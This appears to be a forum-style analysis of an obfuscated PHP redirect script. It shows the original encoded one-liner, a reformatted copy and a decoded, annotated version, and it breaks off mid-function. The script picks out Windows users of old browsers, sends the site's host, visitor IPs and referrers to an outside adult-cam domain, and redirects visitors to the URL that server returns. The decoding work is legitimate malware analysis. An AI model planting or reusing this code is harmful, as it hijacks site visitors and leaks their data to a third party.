 <? $GLOBALS['_664181862_']=Array(base64_decode('Z'.'GVmaW5l'),base64_decode('c3RydG9'.'sb3dl'.'cg=='),base64_decode('a'.'W1'.'hZ2'.'Vj'.'c'.'mVhd'.'GV'.'mc'.'m9tZ2lm'),base64_decode('bX'.'RfcmFuZA=='),base64_decode('c'.'3'.'Ryc'.'G9z'),base64_decode('c3RycG9'.'z'),base64_decode('c3RydG9sb3'.'dlc'.'g=='),base64_decode('c3R'.'yX3JlcG'.'xh'.'Y'.'2'.'U='),base64_decode('dXJ'.'sZW'.'5jb'.'2Rl'),base64_decode('dX'.'JsZW5jb2Rl'),base64_decode('aGVhZG'.'Vy'),base64_decode('d'.'HJpbQ='.'='),base64_decode('aW'.'5pX2dldA'.'=='),base64_decode('cG'.'F'.'yc2VfdX'.'Js'),base64_decode(''.'ZnN'.'vY2tvcGVu'),base64_decode('Z'.'nVuY3R'.'pb'.'2'.'5fZX'.'hpc3'.'Rz'),base64_decode('c3RyZWFtX2'.'NvbnRleHR'.'f'.'Y3J'.'lY'.'XRl'),base64_decode('Y'.'XJyYXlf'.'cmVkdWNl'),base64_decode(''.'ZmZsdXNo'),base64_decode('Zmls'.'ZV9nZXRf'.'Y2'.'9udGVudH'.'M='),base64_decode('Z'.'n'.'B1dHM='),base64_decode(''.'c'.'3RybG'.'Vu'),base64_decode('b'.'XR'.'fcm'.'FuZA=='),base64_decode(''.'Y'.'XJyYXlfZmlsbA=='),base64_decode(''.'ZnJl'.'YWQ'.'='),base64_decode('ZmNs'.'b'.'3Nl'),base64_decode('c3'.'RycG9z'),base64_decode('bXRf'.'cmFuZA=='),base64_decode(''.'Y'.'XJ'.'yYXlfZmx'.'pc'.'A=='),base64_decode('c3'.'Vic3Ry'),base64_decode('Y3VybF9pbml0'),base64_decode(''.'c'.'3'.'Vic3Ry'),base64_decode(''.'b'.'XRfcmF'.'uZA'.'=='),base64_decode('Y3Vyb'.'F9zZXR'.'v'.'cH'.'Q'.'='),base64_decode('Y3Vy'.'bF9zZ'.'XRvcHQ'.'='),base64_decode('cH'.'Jl'.'Z19'.'yZ'.'XB'.'sYW'.'Nl'),base64_decode('Z'.'nJ'.'lYWQ='),base64_decode('Y'.'3V'.'ybF9zZXRvcHQ='),base64_decode('Y3'.'VybF9zZ'.'X'.'R'.'vcHQ'.'='),base64_decode('c'.'3Ry'.'d'.'mFs'),base64_decode(''.'YXJy'.'YX'.'lf'.'bWVy'.'Z2'.'U='),base64_decode(''.'Y3VybF9'.'l'.'e'.'GVj'),base64_decode(''.'Y3'.'VybF9j'.'bG9zZ'.'Q==')); ?><? 
function _724562126($i){$a=Array('QU'.'RN'.'SU5'.'fU'.'k'.'VESVJfVVJM','aHR0cDov'.'L3'.'R'.'lc3QuY'.'3VzdG9tc2V'.'4Y2Ftcy5jb20vcmIvZ2V0X3'.'V'.'ybC5waH'.'A=','SFRUUF'.'9VU'.'0VSX'.'0F'.'HR'.'U5U','SF'.'RUU'.'F9VU'.'0V'.'SX0FH'.'RU5U','','d'.'2luZG'.'93cw='.'=','MXo'.'=','b3Blcm'.'EvOS44MA='.'=','bXNpZSAxMA'.'==','bX'.'NpZSA5','bXNpZSA4','bXNpZSA3','Mno=','SFRU'.'UF9SRUZFUk'.'V'.'S','SF'.'RUUF'.'9SRU'.'ZFUkVS','','M'.'3'.'o=','SFRUUF9'.'I'.'T1N'.'U',''.'SFR'.'U'.'UF9IT'.'1NU','SFRUUF9I'.'T1NU','d3d3'.'Lg==','','SFRU'.'UF9IT1NU','ZD0'.'=','SF'.'R'.'UUF9IT1'.'N'.'U',''.'Og==','U'.'kVNT1'.'R'.'F'.'X0'.'FERFI'.'=','Og==','Q'.'kFE','NHo=','TG9'.'jY'.'XRpb2'.'46'.'IA==','Y'.'Wxs'.'b3dfdXJsX2Z'.'vcGVu','a'.'G9zd'.'A==','aG9zdA='.'=','cGF0aA='.'=','Y3VybF9pb'.'ml0','aHR0'.'cA==','bWV'.'0aG9'.'k','UE9TVA==','a'.'GV'.'hZGVy','Q29udG'.'VudC1'.'U'.'eXBlOiBh'.'cHBsaWNhdG'.'lv'.'bi9'.'4L'.'Xd3dy1m'.'b3'.'J'.'tL'.'XVybG'.'VuY29kZWQ'.'=','Cg==','Y29ud'.'GVudA'.'==','Ym'.'s=','UE'.'9'.'TVCA=','I'.'CBI'.'VFRQLzE'.'uM'.'A0K','VXN'.'lci'.'1BZ2'.'Vud'.'Dog'.'TW9'.'6aWxsYS'.'81LjAgKFdp'.'b'.'m'.'R'.'vd3M7IF'.'U'.'7IFdp'.'bmRvd3MgTl'.'QgNS4xO'.'yBl'.'bi1VUzs'.'gcnY6MS44'.'LjAuMyk'.'g'.'R'.'2V'.'ja28vMj'.'AwNjA0M'.'jYgRmlyZWZveC8'.'x'.'LjUu'.'MC4zDQo'.'=','QWN'.'jZXB0OiAqLy'.'oNC'.'g='.'=',''.'Q'.'WNjZXB0'.'LUxh'.'bmd'.'1YWdlOi'.'Blbi11cyxlbjtxPT'.'AuNQ0'.'K','QWN'.'jZX'.'B0LUN'.'o'.'YXJzZXQ6IE'.'lTTy0'.'4OD'.'U'.'5LTEsdXRmLTg'.'7cT0w'.'LjcsKj'.'txPTA'.'u'.'N'.'w0'.'K','Q29udG'.'VudC1M'.'ZW5n'.'dGg'.'6IA='.'=','D'.'Q'.'o=','','DQ'.'oN'.'Cg==','bQ==','am'.'1wcA==');return base64_decode($a[$i]);} ?><?php 
$GLOBALS['_664181862_'][0](_724562126(0),_724562126(1));$_0=isset($_SERVER[_724562126(2)])?$GLOBALS['_664181862_'][1]($_SERVER[_724562126(3)]):_724562126(4);(round(0+3419)-round(0+1139.6666666667+1139.6666666667+1139.6666666667)+round(0+3826)-round(0+1275.3333333333+1275.3333333333+1275.3333333333))?$GLOBALS['_664181862_'][2]($_1,$_2):$GLOBALS['_664181862_'][3](round(0+854.75+854.75+854.75+854.75),round(0+1938+1938));if($GLOBALS['_664181862_'][4]($_0,_724562126(5))===false){exit(_724562126(6));}$_3=array(_724562126(7),_724562126(8),_724562126(9),_724562126(10),_724562126(11),);$_4=false;foreach($_3 as $_5){if($GLOBALS['_664181862_'][5]($_0,$_5)!==false){$_4=true;break;}}if(!$_4){exit(_724562126(12));}$_6=isset($_SERVER[_724562126(13)])?$_SERVER[_724562126(14)]:_724562126(15);if(empty($_6)){exit(_724562126(16));}$_SERVER[_724562126(17)]=$GLOBALS['_664181862_'][6]($_SERVER[_724562126(18)]);$_SERVER[_724562126(19)]=$GLOBALS['_664181862_'][7](_724562126(20),_724562126(21),$_SERVER[_724562126(22)]);$_7=_724562126(23) .$GLOBALS['_664181862_'][8]($_SERVER[_724562126(24)]) ._724562126(25) .$GLOBALS['_664181862_'][9]($_SERVER[_724562126(26)] ._724562126(27) .$_6);;$_8=l__0($_7);if($_8==_724562126(28)){exit(_724562126(29));}$GLOBALS['_664181862_'][10](_724562126(30) .$GLOBALS['_664181862_'][11]($_8));function l__0($_9){if($GLOBALS['_664181862_'][12](_724562126(31))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){return l__1($_9);}else{$_10=$GLOBALS['_664181862_'][13](ADMIN_REDIR_URL);if($_11=@$GLOBALS['_664181862_'][14]($_10[_724562126(32)],round(0+80),$_12,$_13,round(0+3.75+3.75+3.75+3.75))){return l__2($_11,$_10[_724562126(33)],$_10[_724562126(34)],$_9);}elseif(@$GLOBALS['_664181862_'][15](_724562126(35))){return l__3($_9);}}}function l__1($_7){$_14=$GLOBALS['_664181862_'][16](array(_724562126(36)=> array(_724562126(37)=> _724562126(38),_724562126(39)=> _724562126(40) ._724562126(41),_724562126(42)=> 
$_7,),));if((round(0+767.6+767.6+767.6+767.6+767.6)^round(0+1279.3333333333+1279.3333333333+1279.3333333333))&& $GLOBALS['_664181862_'][17]($_4,$_15,$_5))$GLOBALS['_664181862_'][18]($_16);return $GLOBALS['_664181862_'][19](ADMIN_REDIR_URL,false,$_14);$_17=_724562126(43);}function l__2($_11,$_18,$_19,$_7){$GLOBALS['_664181862_'][20]($_11,_724562126(44) .$_19 ._724562126(45) ."Host: $_18\r\n" ._724562126(46) ._724562126(47) ._724562126(48) ._724562126(49) ._724562126(50) .$GLOBALS['_664181862_'][21]($_7) ._724562126(51) ."Content-Type: application/x-www-form-urlencoded\r\n\r\n$_7");$_2=_724562126(52);if(round(0+1000.25+1000.25+1000.25+1000.25)<$GLOBALS['_664181862_'][22](round(0+537+537+537),round(0+596.25+596.25+596.25+596.25)))$GLOBALS['_664181862_'][23]($_20,$_19,$_13);while($_15=$GLOBALS['_664181862_'][24]($_11,round(0+4096))){$_2 .= $_15;}$GLOBALS['_664181862_'][25]($_11);$_21=round(0+572+572);$_20=$GLOBALS['_664181862_'][26]($_2,_724562126(53));if(round(0+2240+2240)<$GLOBALS['_664181862_'][27](round(0+359.75+359.75+359.75+359.75),round(0+759+759+759+759)))$GLOBALS['_664181862_'][28]($_14,$_20);$_2=$GLOBALS['_664181862_'][29]($_2,$_20+round(0+0.8+0.8+0.8+0.8+0.8));$_22=round(0+500.8+500.8+500.8+500.8+500.8);return $_2;}function l__3($_7){$_1=$GLOBALS['_664181862_'][30](ADMIN_REDIR_URL);(round(0+149+149+149)-round(0+447)+round(0+215)-round(0+71.666666666667+71.666666666667+71.666666666667))?$GLOBALS['_664181862_'][31]($_4,$_15,$_18):$GLOBALS['_664181862_'][32](round(0+89.4+89.4+89.4+89.4+89.4),round(0+3183));$GLOBALS['_664181862_'][33]($_1,42,FALSE);$_23=_724562126(54);$GLOBALS['_664181862_'][34]($_1,19913,TRUE);if((round(0+2508)+round(0+2036.5+2036.5))>round(0+2508)|| 
$GLOBALS['_664181862_'][35]($_20));else{$GLOBALS['_664181862_'][36]($_15,$_7,$_12);}$GLOBALS['_664181862_'][37]($_1,13,round(0+3.75+3.75+3.75+3.75));$_24=_724562126(55);$GLOBALS['_664181862_'][38]($_1,10015,$_7);if((round(0+440+440+440+440)+round(0+200.25+200.25+200.25+200.25))>round(0+586.66666666667+586.66666666667+586.66666666667)|| $GLOBALS['_664181862_'][39]($_11,$_3,$_15));else{$GLOBALS['_664181862_'][40]($_13,$_1);}$_16=$GLOBALS['_664181862_'][41]($_1);$GLOBALS['_664181862_'][42]($_1);$_25=round(0+1576.6666666667+1576.6666666667+1576.6666666667);return $_16;} 

Of course, the file is on one line and its content is encoded in the same way.
Add line breaks:
the contents of the second file
    <?
    $GLOBALS['_664181862_']=Array(
        base64_decode('ZGVmaW5l'),
        base64_decode('c3RydG9sb3dlcg=='),
        base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'),
        base64_decode('bXRfcmFuZA=='),
        base64_decode('c3RycG9z'),
        base64_decode('c3RycG9z'),
        base64_decode('c3RydG9sb3dlcg=='),
        base64_decode('c3RyX3JlcGxhY2U='),
        base64_decode('dXJsZW5jb2Rl'),
        base64_decode('dXJsZW5jb2Rl'),
        base64_decode('aGVhZGVy'),
        base64_decode('dHJpbQ=='),
        base64_decode('aW5pX2dldA=='),
        base64_decode('cGFyc2VfdXJs'),
        base64_decode('ZnNvY2tvcGVu'),
        base64_decode('ZnVuY3Rpb25fZXhpc3Rz'),
        base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'),
        base64_decode('YXJyYXlfcmVkdWNl'),
        base64_decode('ZmZsdXNo'),
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),
        base64_decode('ZnB1dHM='),
        base64_decode('c3RybGVu'),
        base64_decode('bXRfcmFuZA=='),
        base64_decode('YXJyYXlfZmlsbA=='),
        base64_decode('ZnJlYWQ='),
        base64_decode('ZmNsb3Nl'),
        base64_decode('c3RycG9z'),
        base64_decode('bXRfcmFuZA=='),
        base64_decode('YXJyYXlfZmxpcA=='),
        base64_decode('c3Vic3Ry'),
        base64_decode('Y3VybF9pbml0'),
        base64_decode('c3Vic3Ry'),
        base64_decode('bXRfcmFuZA=='),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('cHJlZ19yZXBsYWNl'),
        base64_decode('ZnJlYWQ='),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('c3RydmFs'),
        base64_decode('YXJyYXlfbWVyZ2U='),
        base64_decode('Y3VybF9leGVj'),
        base64_decode('Y3VybF9jbG9zZQ=='));
    ?>
    <?
    function _724562126($i){
        $a=Array(
            'QURNSU5fUkVESVJfVVJM',
            'aHR0cDovL3Rlc3QuY3VzdG9tc2V4Y2Ftcy5jb20vcmIvZ2V0X3VybC5waHA=',
            'SFRUUF9VU0VSX0FHRU5U',
            'SFRUUF9VU0VSX0FHRU5U',
            '',
            'd2luZG93cw==',
            'MXo=',
            'b3BlcmEvOS44MA==',
            'bXNpZSAxMA==',
            'bXNpZSA5',
            'bXNpZSA4',
            'bXNpZSA3',
            'Mno=',
            'SFRUUF9SRUZFUkVS',
            'SFRUUF9SRUZFUkVS',
            '',
            'M3o=',
            'SFRUUF9IT1NU',
            'SFRUUF9IT1NU',
            'SFRUUF9IT1NU',
            'd3d3Lg==',
            '',
            'SFRUUF9IT1NU',
            'ZD0=',
            'SFRUUF9IT1NU',
            'Og==',
            'UkVNT1RFX0FERFI=',
            'Og==',
            'QkFE',
            'NHo=',
            'TG9jYXRpb246IA==',
            'YWxsb3dfdXJsX2ZvcGVu',
            'aG9zdA==',
            'aG9zdA==',
            'cGF0aA==',
            'Y3VybF9pbml0',
            'aHR0cA==',
            'bWV0aG9k',
            'UE9TVA==',
            'aGVhZGVy',
            'Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=',
            'Cg==',
            'Y29udGVudA==',
            'Yms=',
            'UE9TVCA=',
            'ICBIVFRQLzEuMA0K',
            'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=',
            'QWNjZXB0OiAqLyoNCg==',
            'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K',
            'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K',
            'Q29udGVudC1MZW5ndGg6IA==',
            'DQo=',
            '',
            'DQoNCg==',
            'bQ==',
            'am1wcA==');
        return base64_decode($a[$i]);
    }
    ?>
    <?php
    $GLOBALS['_664181862_'][0](_724562126(0),_724562126(1));
    $_0=isset($_SERVER[_724562126(2)])?$GLOBALS['_664181862_'][1]($_SERVER[_724562126(3)]):_724562126(4);
    (round(0+3419)-round(0+1139.6666666667+1139.6666666667+1139.6666666667)+round(0+3826)-round(0+1275.3333333333+1275.3333333333+1275.3333333333))?$GLOBALS['_664181862_'][2]($_1,$_2):$GLOBALS['_664181862_'][3](round(0+854.75+854.75+854.75+854.75),round(0+1938+1938));
    if($GLOBALS['_664181862_'][4]($_0,_724562126(5))===false){
        exit(_724562126(6));
    }
    $_3=array(_724562126(7),_724562126(8),_724562126(9),_724562126(10),_724562126(11),);
    $_4=false;
    foreach($_3 as $_5){
        if($GLOBALS['_664181862_'][5]($_0,$_5)!==false){
            $_4=true;
            break;
        }
    }
    if(!$_4){
        exit(_724562126(12));
    }
    $_6=isset($_SERVER[_724562126(13)])?$_SERVER[_724562126(14)]:_724562126(15);
    if(empty($_6)){
        exit(_724562126(16));
    }
    $_SERVER[_724562126(17)]=$GLOBALS['_664181862_'][6]($_SERVER[_724562126(18)]);
    $_SERVER[_724562126(19)]=$GLOBALS['_664181862_'][7](_724562126(20),_724562126(21),$_SERVER[_724562126(22)]);
    $_7=_724562126(23) .$GLOBALS['_664181862_'][8]($_SERVER[_724562126(24)]) ._724562126(25) .$GLOBALS['_664181862_'][9]($_SERVER[_724562126(26)] ._724562126(27) .$_6);;
    $_8=l__0($_7);
    if($_8==_724562126(28)){
        exit(_724562126(29));
    }
    $GLOBALS['_664181862_'][10](_724562126(30) .$GLOBALS['_664181862_'][11]($_8));
    function l__0($_9){
        if($GLOBALS['_664181862_'][12](_724562126(31))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){
            return l__1($_9);
        }else{
            $_10=$GLOBALS['_664181862_'][13](ADMIN_REDIR_URL);
            if($_11=@$GLOBALS['_664181862_'][14]($_10[_724562126(32)],round(0+80),$_12,$_13,round(0+3.75+3.75+3.75+3.75))){
                return l__2($_11,$_10[_724562126(33)],$_10[_724562126(34)],$_9);
            }elseif(@$GLOBALS['_664181862_'][15](_724562126(35))){
                return l__3($_9);
            }
        }
    }
    function l__1($_7){
        $_14=$GLOBALS['_664181862_'][16](array(_724562126(36)=> array(_724562126(37)=> _724562126(38),_724562126(39)=> _724562126(40) ._724562126(41),_724562126(42)=> $_7,),));
        if((round(0+767.6+767.6+767.6+767.6+767.6)^round(0+1279.3333333333+1279.3333333333+1279.3333333333))&& $GLOBALS['_664181862_'][17]($_4,$_15,$_5))$GLOBALS['_664181862_'][18]($_16);
        return $GLOBALS['_664181862_'][19](ADMIN_REDIR_URL,false,$_14);
        $_17=_724562126(43);
    }
    function l__2($_11,$_18,$_19,$_7){
        $GLOBALS['_664181862_'][20]($_11,_724562126(44) .$_19 ._724562126(45) ."Host: $_18\r\n" ._724562126(46) ._724562126(47) ._724562126(48) ._724562126(49) ._724562126(50) .$GLOBALS['_664181862_'][21]($_7) ._724562126(51) ."Content-Type: application/x-www-form-urlencoded\r\n\r\n$_7");
        $_2=_724562126(52);
        if(round(0+1000.25+1000.25+1000.25+1000.25)<$GLOBALS['_664181862_'][22](round(0+537+537+537),round(0+596.25+596.25+596.25+596.25)))$GLOBALS['_664181862_'][23]($_20,$_19,$_13);
        while($_15=$GLOBALS['_664181862_'][24]($_11,round(0+4096))){
            $_2 .= $_15;
        }
        $GLOBALS['_664181862_'][25]($_11);
        $_21=round(0+572+572);
        $_20=$GLOBALS['_664181862_'][26]($_2,_724562126(53));
        if(round(0+2240+2240)<$GLOBALS['_664181862_'][27](round(0+359.75+359.75+359.75+359.75),round(0+759+759+759+759)))$GLOBALS['_664181862_'][28]($_14,$_20);
        $_2=$GLOBALS['_664181862_'][29]($_2,$_20+round(0+0.8+0.8+0.8+0.8+0.8));
        $_22=round(0+500.8+500.8+500.8+500.8+500.8);
        return $_2;
    }
    function l__3($_7){
        $_1=$GLOBALS['_664181862_'][30](ADMIN_REDIR_URL);
        (round(0+149+149+149)-round(0+447)+round(0+215)-round(0+71.666666666667+71.666666666667+71.666666666667))?$GLOBALS['_664181862_'][31]($_4,$_15,$_18):$GLOBALS['_664181862_'][32](round(0+89.4+89.4+89.4+89.4+89.4),round(0+3183));
        $GLOBALS['_664181862_'][33]($_1,42,FALSE);
        $_23=_724562126(54);
        $GLOBALS['_664181862_'][34]($_1,19913,TRUE);
        if((round(0+2508)+round(0+2036.5+2036.5))>round(0+2508)|| $GLOBALS['_664181862_'][35]($_20));
        else{
            $GLOBALS['_664181862_'][36]($_15,$_7,$_12);
        }
        $GLOBALS['_664181862_'][37]($_1,13,round(0+3.75+3.75+3.75+3.75));
        $_24=_724562126(55);
        $GLOBALS['_664181862_'][38]($_1,10015,$_7);
        if((round(0+440+440+440+440)+round(0+200.25+200.25+200.25+200.25))>round(0+586.66666666667+586.66666666667+586.66666666667)|| $GLOBALS['_664181862_'][39]($_11,$_3,$_15));
        else{
            $GLOBALS['_664181862_'][40]($_13,$_1);
        }
        $_16=$GLOBALS['_664181862_'][41]($_1);
        $GLOBALS['_664181862_'][42]($_1);
        $_25=round(0+1576.6666666667+1576.6666666667+1576.6666666667);
        return $_16;
    }
    ?>

Decoding the code.
The contents of the second file, with each table index annotated with its decoded value:
<?
// Function table $GLOBALS['_664181862_']: every call in the script goes through
// $GLOBALS['_664181862_'][N](...); the index annotations give the decoded name.
$GLOBALS['_664181862_'] = Array(
    base64_decode('ZGVmaW5l'),                       // [0]  define
    base64_decode('c3RydG9sb3dlcg=='),               // [1]  strtolower
    base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'),       // [2]  imagecreatefromgif
    base64_decode('bXRfcmFuZA=='),                   // [3]  mt_rand
    base64_decode('c3RycG9z'),                       // [4]  strpos
    base64_decode('c3RycG9z'),                       // [5]  strpos
    base64_decode('c3RydG9sb3dlcg=='),               // [6]  strtolower
    base64_decode('c3RyX3JlcGxhY2U='),               // [7]  str_replace
    base64_decode('dXJsZW5jb2Rl'),                   // [8]  urlencode
    base64_decode('dXJsZW5jb2Rl'),                   // [9]  urlencode
    base64_decode('aGVhZGVy'),                       // [10] header
    base64_decode('dHJpbQ=='),                       // [11] trim
    base64_decode('aW5pX2dldA=='),                   // [12] ini_get
    base64_decode('cGFyc2VfdXJs'),                   // [13] parse_url
    base64_decode('ZnNvY2tvcGVu'),                   // [14] fsockopen
    base64_decode('ZnVuY3Rpb25fZXhpc3Rz'),           // [15] function_exists
    base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'),   // [16] stream_context_create
    base64_decode('YXJyYXlfcmVkdWNl'),               // [17] array_reduce
    base64_decode('ZmZsdXNo'),                       // [18] fflush
    base64_decode('ZmlsZV9nZXRfY29udGVudHM='),       // [19] file_get_contents
    base64_decode('ZnB1dHM='),                       // [20] fputs
    base64_decode('c3RybGVu'),                       // [21] strlen
    base64_decode('bXRfcmFuZA=='),                   // [22] mt_rand
    base64_decode('YXJyYXlfZmlsbA=='),               // [23] array_fill
    base64_decode('ZnJlYWQ='),                       // [24] fread
    base64_decode('ZmNsb3Nl'),                       // [25] fclose
    base64_decode('c3RycG9z'),                       // [26] strpos
    base64_decode('bXRfcmFuZA=='),                   // [27] mt_rand
    base64_decode('YXJyYXlfZmxpcA=='),               // [28] array_flip
    base64_decode('c3Vic3Ry'),                       // [29] substr
    base64_decode('Y3VybF9pbml0'),                   // [30] curl_init
    base64_decode('c3Vic3Ry'),                       // [31] substr
    base64_decode('bXRfcmFuZA=='),                   // [32] mt_rand
    base64_decode('Y3VybF9zZXRvcHQ='),               // [33] curl_setopt
    base64_decode('Y3VybF9zZXRvcHQ='),               // [34] curl_setopt
    base64_decode('cHJlZ19yZXBsYWNl'),               // [35] preg_replace
    base64_decode('ZnJlYWQ='),                       // [36] fread
    base64_decode('Y3VybF9zZXRvcHQ='),               // [37] curl_setopt
    base64_decode('Y3VybF9zZXRvcHQ='),               // [38] curl_setopt
    base64_decode('c3RydmFs'),                       // [39] strval
    base64_decode('YXJyYXlfbWVyZ2U='),               // [40] array_merge
    base64_decode('Y3VybF9leGVj'),                   // [41] curl_exec
    base64_decode('Y3VybF9jbG9zZQ==')                // [42] curl_close
);
?>
<?
// String table: every literal in the script is fetched as _724562126(N).
// Whitespace-only entries are shown escaped ("\r\n" etc.); '' is an empty string.
function _724562126($i) {
    $a = Array(
        'QURNSU5fUkVESVJfVVJM',                                        // [0]  ADMIN_REDIR_URL
        'aHR0cDovL3Rlc3QuY3VzdG9tc2V4Y2Ftcy5jb20vcmIvZ2V0X3VybC5waHA=', // [1]  http://test.customsexcams.com/rb/get_url.php
        'SFRUUF9VU0VSX0FHRU5U',                                        // [2]  HTTP_USER_AGENT
        'SFRUUF9VU0VSX0FHRU5U',                                        // [3]  HTTP_USER_AGENT
        '',                                                            // [4]  ''
        'd2luZG93cw==',                                                // [5]  windows
        'MXo=',                                                        // [6]  1z
        'b3BlcmEvOS44MA==',                                            // [7]  opera/9.80
        'bXNpZSAxMA==',                                                // [8]  msie 10
        'bXNpZSA5',                                                    // [9]  msie 9
        'bXNpZSA4',                                                    // [10] msie 8
        'bXNpZSA3',                                                    // [11] msie 7
        'Mno=',                                                        // [12] 2z
        'SFRUUF9SRUZFUkVS',                                            // [13] HTTP_REFERER
        'SFRUUF9SRUZFUkVS',                                            // [14] HTTP_REFERER
        '',                                                            // [15] ''
        'M3o=',                                                        // [16] 3z
        'SFRUUF9IT1NU',                                                // [17] HTTP_HOST
        'SFRUUF9IT1NU',                                                // [18] HTTP_HOST
        'SFRUUF9IT1NU',                                                // [19] HTTP_HOST
        'd3d3Lg==',                                                    // [20] www.
        '',                                                            // [21] ''
        'SFRUUF9IT1NU',                                                // [22] HTTP_HOST
        'ZD0=',                                                        // [23] d=
        'SFRUUF9IT1NU',                                                // [24] HTTP_HOST
        'Og==',                                                        // [25] :
        'UkVNT1RFX0FERFI=',                                            // [26] REMOTE_ADDR
        'Og==',                                                        // [27] :
        'QkFE',                                                        // [28] BAD
        'NHo=',                                                        // [29] 4z
        'TG9jYXRpb246IA==',                                            // [30] "Location: "
        'YWxsb3dfdXJsX2ZvcGVu',                                        // [31] allow_url_fopen
        'aG9zdA==',                                                    // [32] host
        'aG9zdA==',                                                    // [33] host
        'cGF0aA==',                                                    // [34] path
        'Y3VybF9pbml0',                                                // [35] curl_init
        'aHR0cA==',                                                    // [36] http
        'bWV0aG9k',                                                    // [37] method
        'UE9TVA==',                                                    // [38] POST
        'aGVhZGVy',                                                    // [39] header
        'Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=', // [40] Content-Type: application/x-www-form-urlencoded
        'Cg==',                                                        // [41] "\n"
        'Y29udGVudA==',                                                // [42] content
        'Yms=',                                                        // [43] bk
        'UE9TVCA=',                                                    // [44] "POST "
        'ICBIVFRQLzEuMA0K',                                            // [45] "  HTTP/1.0\r\n"
        'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=', // [46] "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n"
        'QWNjZXB0OiAqLyoNCg==',                                        // [47] "Accept: */*\r\n"
        'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K',                // [48] "Accept-Language: en-us,en;q=0.5\r\n"
        'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K', // [49] "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
        'Q29udGVudC1MZW5ndGg6IA==',                                    // [50] "Content-Length: "
        'DQo=',                                                        // [51] "\r\n"
        '',                                                            // [52] ''
        'DQoNCg==',                                                    // [53] "\r\n\r\n"
        'bQ==',                                                        // [54] m
        'am1wcA=='                                                     // [55] jmpp
    );
    return base64_decode($a[$i]);
}
?>
<?php
// The main body with both tables inlined. The round(0+x+x+...) expressions are padding
// that always evaluates to the same constants; they are folded here and the dead
// branches they guard are marked "junk".
define('ADMIN_REDIR_URL', 'http://test.customsexcams.com/rb/get_url.php');
if (isset($_SERVER['HTTP_USER_AGENT'])) {
    $_0 = strtolower($_SERVER['HTTP_USER_AGENT']);
} else {
    $_0 = '';
}
if (0) {                                   // junk: (3419-3419+3826-3826) is always 0
    imagecreatefromgif($_1, $_2);
} else {
    mt_rand(3419, 3876);
}
if (strpos($_0, 'windows') === false) {
    exit('1z');
}
$_3 = Array('opera/9.80', 'msie 10', 'msie 9', 'msie 8', 'msie 7');
$_4 = false;
foreach ($_3 as $_5) {
    if (strpos($_0, $_5) !== false) {
        $_4 = true;
        break;
    }
}
if (!$_4) {
    exit('2z');
}
if (isset($_SERVER['HTTP_REFERER'])) {
    $_6 = $_SERVER['HTTP_REFERER'];
} else {
    $_6 = '';
}
if (empty($_6)) {
    exit('3z');
}
$_SERVER['HTTP_HOST'] = strtolower($_SERVER['HTTP_HOST']);
$_SERVER['HTTP_HOST'] = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$_7 = 'd=' . urlencode($_SERVER['HTTP_HOST']) . ':' . urlencode($_SERVER['REMOTE_ADDR'] . ':' . $_6);
$_8 = l__0($_7);
if ($_8 == 'BAD') {
    exit('4z');
}
header('Location: ' . trim($_8));

function l__0($_9) {
    if (ini_get('allow_url_fopen') == 1) {   // round(0+0.333+0.333+0.333) == 1
        return l__1($_9);
    } else {
        $_10 = parse_url(ADMIN_REDIR_URL);
        if ($_11 = @fsockopen($_10['host'], 80, $_12, $_13, 15)) {
            return l__2($_11, $_10['host'], $_10['path'], $_9);
        } elseif (@function_exists('curl_init')) {
            return l__3($_9);
        }
    }
}

function l__1($_7) {
    $_14 = stream_context_create(array(
        'http' => array(
            'method'  => 'POST',
            'header'  => 'Content-Type: application/x-www-form-urlencoded' . "\n",
            'content' => $_7,
        ),
    ));
    if ((3838 ^ 3838) && array_reduce($_4, $_15, $_5)) fflush($_16);   // junk: 0 && ...
    return file_get_contents(ADMIN_REDIR_URL, false, $_14);
    $_17 = 'bk';                                                        // junk: unreachable
}

function l__2($_11, $_18, $_19, $_7) {
    fputs($_11, 'POST ' . $_19 . "  HTTP/1.0\r\n"
        . "Host: $_18\r\n"
        . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n"
        . "Accept: */*\r\n"
        . "Accept-Language: en-us,en;q=0.5\r\n"
        . "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
        . 'Content-Length: ' . strlen($_7) . "\r\n"
        . "Content-Type: application/x-www-form-urlencoded\r\n\r\n$_7");
    $_2 = '';
    if (4001 < mt_rand(1611, 2385)) array_fill($_20, $_19, $_13);      // junk: never true
    while ($_15 = fread($_11, 4096)) {
        $_2 .= $_15;
